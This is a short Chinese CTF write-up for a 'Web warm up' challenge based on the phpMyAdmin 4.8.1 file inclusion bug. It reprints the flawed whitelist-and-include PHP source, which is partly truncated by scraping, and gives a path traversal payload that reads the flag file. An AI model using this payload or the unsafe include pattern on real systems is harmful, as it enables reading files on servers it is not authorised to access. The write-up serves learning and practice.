摘要:這個題目原型是的任意文件包含漏洞發現源碼不為空是字符串上面定義的方法返回值為真
[toc]
Web warm up這個題目原型是phpmyadmin4.8.1的任意文件包含漏洞
發現源碼
"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can"t see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . "?", "?") ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . "?", "?") ); if (in_array($_page, $whitelist)) { return true; } echo "you can"t see it"; return false; } } if (! empty($_REQUEST["file"]) 不為空 && is_string($_REQUEST["file"]) 是字符串 && emmm::checkFile($_REQUEST["file"]) 上面定義的checkfile方法返回值為真 ) { include $_REQUEST["file"]; exit; } else { echo "
"; } ?>
payloadhint.php?/../../../../../ffffllllaaaagggg
文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。
轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/31727.html
摘要:第二題返老還童拿到之后丟進,發現只有,代碼,沒有。仔細觀察發現,以上坐標可以對應坐標系中的一個九宮格。有點腦洞,把九個坐標編好數字,然后按照坐標給出的順序寫數字就是答案。 Mobile 第二題:返老還童(1000pt) 拿到apk之后丟進JEB,發現只有.class,java代碼,沒有so。整個apk的class文件結構如下: a.a.a com.reverse.daydayup.a ...
閱讀 2078·2021-10-08 10:21
閱讀 2471·2021-09-29 09:34
閱讀 3494·2021-09-22 15:51
閱讀 4926·2021-09-22 15:46
閱讀 2314·2021-08-09 13:42
閱讀 3434·2019-08-30 15:52
閱讀 2723·2019-08-29 17:13
閱讀 1555·2019-08-29 11:30